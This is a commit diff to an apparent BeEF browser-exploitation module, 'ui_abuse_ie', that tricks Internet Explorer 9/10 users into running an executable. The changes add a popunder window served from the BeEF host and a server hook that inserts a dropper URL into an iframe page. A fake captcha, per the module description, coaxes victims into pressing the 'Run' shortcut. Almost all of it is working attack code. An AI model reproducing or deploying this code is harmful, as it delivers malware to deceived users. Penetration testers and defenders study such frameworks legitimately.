Continued working on ui_abuse_ie module

2014-03-12 20:58:39 +00:00
parent 14f1991542
commit d4fd537108
4 changed files with 31 additions and 13 deletions
--- a/modules/social_engineering/ui_abuse_ie/command.js
+++ b/modules/social_engineering/ui_abuse_ie/command.js
@@ -7,7 +7,7 @@
 beef.execute(function() {
 	if(beef.browser.isIE()){

-       getLanguage = function(){
+        var getLanguage = function(){
           var lang = null;
           switch (beef.browser.getBrowserLanguage().substring(0,2)){
               case "en":
@@ -20,7 +20,7 @@ beef.execute(function() {
           return lang;
       };

-        grayOut = function(vis, options) {
+        var grayOut = function(vis, options) {
            var options = options || {};
            var zindex = options.zindex || 50;
            var opacity = options.opacity || 70;
@@ -55,18 +55,21 @@ beef.execute(function() {
            }
        };

-        spawnPopunder = function(){
-            //TODO this will be replaced with a webpage served by BeEF
-            var pu = window.open('popunder.html','','top=0, left=0,width=500,height=500');
+        function spawnPopunder(){
+            var url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/underpop.html'
+            var pu = window.open(url,'','top=0, left=0,width=500,height=500');
            pu.blur();
-        };
+        }

        if(beef.browser.isIE9()){
           // [TAB] + shortcut
-            $(document.body).attr('onclick', 'spawnPopunder();');
+            document.body.onclick = function (){spawnPopunder();};
        }else if(beef.browser.isIE10()){
           // just shortcut
-            $(document.body).attr('onclick', 'spawnPopunder();');
+            document.body.onclick = function (){spawnPopunder();};
+            //TODO using TAB+R works delivering this via BeEF, but it should work without Tab too.
+            // Probably there are some issues with the popunder focus and blur
+            //setTimeout(function (){spawnPopunder();}, 1000);

            //TODO Using Gray-out, display the fake captcha with the 2 gifs (base64 the gif content and use dataURI inline image)
        }else{
--- a/modules/social_engineering/ui_abuse_ie/config.yaml
+++ b/modules/social_engineering/ui_abuse_ie/config.yaml
@@ -9,7 +9,7 @@ beef:
            enable: true
            category: "Social Engineering"
            name: "User Interface Abuse (IE 9/10)"
-            description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
+            description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). You can mount an exe in BeEF as per extensions/social_engineering/droppers/readme.txt. The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
            authors: ["Rosario Valotta", "antisnatchor"]
            target:
                working: ["IE"]
--- a/modules/social_engineering/ui_abuse_ie/module.rb
+++ b/modules/social_engineering/ui_abuse_ie/module.rb
@@ -12,11 +12,26 @@ class Ui_abuse_ie < BeEF::Core::Command

 	def self.options
 		return [
-        {'name' => 'dropper_url', 'ui_label' => 'Executable URL (must be signed)', 'value' => 'http://dropper_url/dropper.exe'}
+        {'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe'}
 		]
  end

-  #TODO pre-execute -> read popunder.html, replace placeholder, and serve it mounting a new URL
+  def pre_send
+    begin
+
+      @datastore.each do |input|
+        if input['name'] == "exe_url"
+          @exe_url = input['value']
+        end
+      end
+
+      popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html")
+      body = popunder.gsub("__URL_PLACEHOLDER__", @exe_url)
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html'}, body, "/underpop.html", -1)
+    rescue Exception => e
+      print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}"
+    end
+  end

 	def post_execute
 		content = {}
--- a/modules/social_engineering/ui_abuse_ie/templates/popunder.html
+++ b/modules/social_engineering/ui_abuse_ie/templates/popunder.html
@@ -5,9 +5,9 @@
 <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
 </head>
 <body style="height: 1000px" >
-<iframe id="f1" width="100" height="100"></iframe>
+<iframe id="xu" width="100" height="100"></iframe>
 <script type="text/javascript">
- document.getElementById("f1").src="__URL-PLACEHOLDER__";
+ document.getElementById("xu").src="__URL_PLACEHOLDER__";
 </script>    
 </body>
 </html>